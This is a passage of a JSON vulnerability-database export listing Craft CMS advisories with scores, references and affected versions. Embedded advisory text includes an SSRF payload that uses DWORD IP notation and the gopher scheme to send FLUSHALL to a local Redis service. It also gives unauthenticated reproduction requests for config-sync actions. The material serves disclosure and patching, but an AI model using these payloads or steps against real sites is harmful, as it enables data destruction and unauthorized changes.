enabled.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56145","reference_id":"","reference_type":"","scores":[{"value":"0.93926","scoring_system":"epss","scoring_elements":"0.99888","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56145"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-06-06T03:55:30Z/"}],"url":"https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-56145","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRI
TICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-56145"},{"reference_url":"https://github.com/Chocapikk/CVE-2024-56145","reference_id":"CVE-2024-56145","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Chocapikk/CVE-2024-56145"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56145","reference_id":"CVE-2024-56145","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56145"},{"reference_url":"https://github.com/advisories/GHSA-2p6p-9rc9-62j9","reference_id":"GHSA-2p6p-9rc9-62j9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2p6p-9rc9-62j9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9","reference_id":"GHSA-2p6p-9rc9-62j9","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scorin
g_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2025-06-06T03:55:30Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83572?format=json","purl":"pkg:composer/craftcms/cms@5.5.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg
"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.5.2"}],"aliases":["CVE-2024-56145","GHSA-2p6p-9rc9-62j9"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c2nk-y4rx-1qf4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56174?format=json","vulnerability_id":"VCID-chep-xthg-zuee","summary":"Craft CMS Arbitrary System File Read\nBy abusing the mail notification template it is possible to read arbitrary operating system files.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52292","reference_id":"","reference_type":"","scores":[{"value":"0.00428","scoring_system":"epss","scoring_elements":"0.62805","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52292"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52292","reference_id":"CVE-2024-52292","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HI
GH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52292"},{"reference_url":"https://github.com/advisories/GHSA-cw6g-qmjq-6w2w","reference_id":"GHSA-cw6g-qmjq-6w2w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-cw6g-qmjq-6w2w"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-cw6g-qmjq-6w2w","reference_id":"GHSA-cw6g-qmjq-6w2w","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-13T18:52:42Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-cw6g-qmjq-6w2w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83231?format=json","purl":"pkg:composer/craftcms/cms@5.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-c2nk-y4rx-1qf4"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-
efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.4.9"}],"aliases":["CVE-2024-52292","GHSA-cw6g-qmjq-6w2w"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-chep-xthg-zuee"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50072?format=json","vulnerability_id":"VCID-cys8-jnmu-77ec","summary":"Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via Alternative IP Notation\nThe `saveAsset` GraphQL mutation uses `filter_var(..., FILTER_VALIDATE_IP)` to block a specific list of IP addresses. 
However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25494","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05057","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25494"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d49e93e5ba0c48939ce5eaa6cd9b4a990542d8b2","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/commit/d49e93e5ba0c48939ce5eaa6cd9b4a990542d8b2"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/
IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25494","reference_id":"CVE-2026-25494","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25494"},{"reference_url":"https://github.com/advisories/GHSA-m5r2-8p9x-hp5m","reference_id":"GHSA-m5r2-8p9x-hp5m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m5r2-8p9x-hp5m"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-m5r2-8p9x-hp5m","reference_id":"GHSA-m5r2-8p9x-hp5m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"valu
e":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:49Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-m5r2-8p9x-hp5m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability
":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25494","GHSA-m5r2-8p9x-hp5m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cys8-jnmu-77ec"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89237?format=json","vulnerability_id":"VCID-e94m-mj1k-8kbr","summary":"Server-Side Request Forgery (SSRF) in Craft CMS with Asset Uploads Mutations\n## Required Permissions\n\nThe exploitation requires a few permissions to be enabled in the used GraphQL schema:\n\n* \"Edit assets in the <VolumeName> volume\"\n* \"Create assets in the <VolumeName> volume\"\n\n## Details\n\nThe implementation fails to restrict the URL Scheme. While the application is intended to \"upload assets\", there is no whitelist forcing `http` or `https`. 
This allows attackers to use the Gopher protocol to wrap raw TCP commands.\n\n**Impact:** Combined with the DWORD bypass, an attacker can hit internal services without triggering any \"127.0.0.1\" string-matching filters.\n\n**Example Payload:** gopher://2130706433:6379/_FLUSHALL (Targets local Redis via DWORD).\n\n**Remediation Strategy**\n\nTo prevent mathematical IP obfuscation, the application must normalize the hostname before validation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41129","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13052","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41129"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d20aecfaa0eae076c4154be3b17e1f9fa05ce46f","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-22T17:52:52Z/"}],"url":"https://github.com/craftcms/cms/commit/d20aecfaa0eae076c4154be3b17e1f9fa05ce46f"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3m9m-24vh-39wx","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual",
"scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-22T17:52:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3m9m-24vh-39wx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41129","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41129"},{"reference_url":"https://github.com/advisories/GHSA-3m9m-24vh-39wx","reference_id":"GHSA-3m9m-24vh-39wx","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3m9m-24vh-39wx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110278?format=json","purl":"pkg:composer/craftcms/cms@5.9.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-asek-4gme-gug8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.15"}],"aliases":["CVE-2026-41129","GHSA-3m9m-24vh-39wx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e94m-mj1k-8kbr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91200?format=json","vulnerability_id":"VCID-eaxm-rjr7-xudb","summary":"Craft CMS: Unauthenticated Users Can Perform Restricted Project Config Sync Operations\n### Summary\nGuest users can access Config Sync updater `index`, obtain signed `data`, and execute state-changing Config Sync actions (`regenerate-yaml`, `apply-yaml-changes`) without authentication.\n\n### Details\n\n`ConfigSyncController` extends `BaseUpdaterController`, and the base updater is anonymously accessible for control panel requests.  
`index` emits signed updater state (`data`), which can be reused by guests in subsequent requests.\n\nSensitive actions that are reachable via this method are `actionApplyYamlChanges`, `actionRegenerateYaml`, `applyExternalChanges`, and `regenerateExternalConfig`.\n\n#### Reproduction steps\n\n1. Guest POST to:\n\n    http POST /admin/actions/config-sync/index\n\n  2. Extract data from returned JS state:\n\n    Craft.updater = ... setState({\"data\":\"<signedData>\", ...});\n\n  3. Reuse data as a guest:\n\n```\n  POST /admin/actions/config-sync/regenerate-yaml\n  data=<signedData>&<csrfParam>=<csrfToken>\n```\n\n  or\n\n```\n  POST /admin/actions/config-sync/apply-yaml-changes\n  data=<signedData>&<csrfParam>=<csrfToken>\n```\n\n  4. Observe completed response and state/file changes.\n\n### Impact\n\nUnauthenticated users can execute project configuration sync operations that should be restricted to trusted admin/deployment contexts.\n\nDepending on the pending YAML/config state, this can cause unauthorized config state transitions and a service integrity risk.\n\n### 
Resources\n\nhttps://github.com/craftcms/cms/commit/7f0ead833f7","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33159","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06623","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33159"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7f0ead833f7c2b91ae12003caad833479dd08592","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/commit/7f0ead833f7c2b91ae12003caad833479dd08592"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements